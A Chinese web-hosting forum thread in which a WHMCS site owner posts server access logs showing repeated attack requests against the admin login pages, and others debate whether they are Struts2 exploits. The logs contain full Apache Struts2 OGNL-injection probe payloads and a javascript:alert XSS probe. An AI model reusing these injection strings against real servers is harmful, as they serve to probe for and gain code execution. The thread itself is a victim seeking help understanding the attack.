升级了WHMCS,忘记把admin删掉,结果有人搞事……
[*]220.181.165.135 - - "GET /admin/login.php?struts&(a)(('\x5Cu0023_memberAccess.allowStaticMethodAccess\x5Cu003dtrue')(z))&(b)(('\x5Cu0023context[\x5C'xwork.MethodAccessor.denyMethodExecution\x5C']\x5Cu003dfalse')(z))&(c)(('\x5Cu0023_memberAccess.excludeProperties\x5Cu003d{}')(z))&(d)(('\x5Cu0023a_str\x5Cu003d\x5C'814F60BD-F6DF-4227-\x5C'')(z))&(e)(('\x5Cu0023b_str\x5Cu003d\x5C'86F5-8D9FBF26A2EB\x5C'')(z))&(n)(('\x5Cu0023a_resp\x5Cu003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\x5Cu0023a_resp.getWriter().println(\x5Cu0023a_str\x5Cu002B\x5Cu0023b_str)')(z))&(p)(('\x5Cu0023a_resp.getWriter().flush()')(z))&(q)(('\x5Cu0023a_resp.getWriter().close()')(z)) HTTP/1.1" 200 4509 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"复制代码[*]220.181.165.134 - - "GET /admin/dologin.php?redirect%3A%24%7B%23a_str%3Dnew%20java.lang.String%28%27814F60BD-F6DF-4227-%27%29%2C%23b_str%3Dnew%20java.lang.String%28%2786F5-8D9FBF26A2EB%27%29%2C%23a_resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23a_resp.getWriter%28%29.println%28%23a_str.concat%28%23b_str%29%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29%7D HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"复制代码[*]220.181.165.132 - - "GET /admin/login.php?action=resetjavascript:alert(9527) HTTP/1.1" 200 2679 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"复制代码连续搞了很多次,N多IP,邮箱都爆了……表示看了很久都看不出什么东西,朋友说是struts,WHMCS和struts无关吧? [*](('\x5Cu0023a_resp\x5Cu003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)复制代码你朋友根据这个来看的吧?
DOS 发表于 2013-8-8 10:10
你朋友根据这个来看的吧?
不知道,我在观察日志,挺多的 whmcs php的,不可能有java的struts漏洞哈。
页:
[1]